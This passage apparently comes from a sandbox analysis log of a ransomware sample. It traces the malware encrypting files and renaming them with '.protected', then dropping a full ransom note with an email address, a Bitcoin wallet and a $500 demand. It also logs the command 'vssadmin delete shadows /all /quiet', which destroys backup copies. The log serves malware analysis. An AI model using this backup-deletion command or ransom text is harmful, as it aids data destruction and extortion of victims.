dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.096] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".txt") returned 0x0 [0096.096] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".rar") returned 0x0 [0096.096] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0096.096] StrStrW (lpFirst="Wildlife.wmv", lpSrch=".zip") returned 0x0 [0096.096] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.108] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.108] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.108] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.109] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.110] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.110] CloseHandle (hObject=0xd4) returned 1 [0096.126] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.protected") returned 63 [0096.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.protected" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.protected")) returned 1 [0096.127] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0096.127] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0096.127] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\RESTORE_FILES.txt") returned 58 [0096.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\videos\\sample videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.127] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0096.128] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.128] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0096.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.128] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0096.128] CloseHandle (hObject=0xb4) returned 1 [0096.129] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0096.129] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0096.129] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\RESTORE_FILES.txt") returned 44 [0096.129] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\videos\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0096.129] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.129] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0096.130] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.130] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0096.130] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.130] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0096.130] CloseHandle (hObject=0xa4) returned 1 [0096.130] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0096.130] FindClose (in: hFindFile=0x47b950 | out: hFindFile=0x47b950) returned 1 [0096.130] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\RESTORE_FILES.txt") returned 37 [0096.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0096.131] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.131] WriteFile (in: hFile=0x104, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0096.131] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.131] WriteFile (in: hFile=0x104, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0096.132] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.132] WriteFile (in: hFile=0x104, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0096.132] CloseHandle (hObject=0x104) returned 1 [0096.132] FindNextFileW (in: hFindFile=0x47b910, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0096.132] FindClose (in: hFindFile=0x47b910 | out: hFindFile=0x47b910) returned 1 [0096.132] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\RESTORE_FILES.txt") returned 30 [0096.132] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RESTORE_FILES.txt" (normalized: "c:\\users\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xdc [0096.132] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.132] WriteFile (in: hFile=0xdc, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0096.133] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.133] WriteFile (in: hFile=0xdc, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0096.133] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.133] WriteFile (in: hFile=0xdc, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0096.133] CloseHandle (hObject=0xdc) returned 1 [0096.133] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0096.133] lstrcmpiW (lpString1="Windows", lpString2="Windows") returned 0 [0096.133] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 0 [0096.133] FindClose (in: hFindFile=0x4472f8 | out: hFindFile=0x4472f8) returned 1 [0096.133] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\RESTORE_FILES.txt") returned 24 [0096.133] CreateFileW (lpFileName="\\\\?\\C:\\RESTORE_FILES.txt" (normalized: "c:\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0096.134] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.134] WriteFile (in: hFile=0x9c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f8c4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f8c4*=0x53d, lpOverlapped=0x0) returned 1 [0096.134] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.134] WriteFile (in: hFile=0x9c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f8c4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f8c4*=0x2ac, lpOverlapped=0x0) returned 1 [0096.134] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.134] WriteFile (in: hFile=0x9c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f8c4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f8c4*=0xb1, lpOverlapped=0x0) returned 1 [0096.135] CloseHandle (hObject=0x9c) returned 1 Thread: id = 9 os_tid = 0x9c0 Thread: id = 10 os_tid = 0x9c4 Thread: id = 41 os_tid = 0xb04 Process: id = "2" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x3e42f000" os_pid = "0x984" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x97c" cmd_line = " delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e814" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 239 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 240 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 241 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 242 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 243 start_va = 0x77860000 end_va = 0x77a08fff entry_point = 0x77860000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 244 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 245 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 246 start_va = 0x7fff0000 end_va = 0x7fff0fff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 247 start_va = 0xffd20000 end_va = 0xffd4cfff entry_point = 0xffd20000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 248 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 249 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 250 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 251 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 253 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 254 start_va = 0x77740000 end_va = 0x7785efff entry_point = 0x77740000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 255 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 272 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 273 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 274 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 275 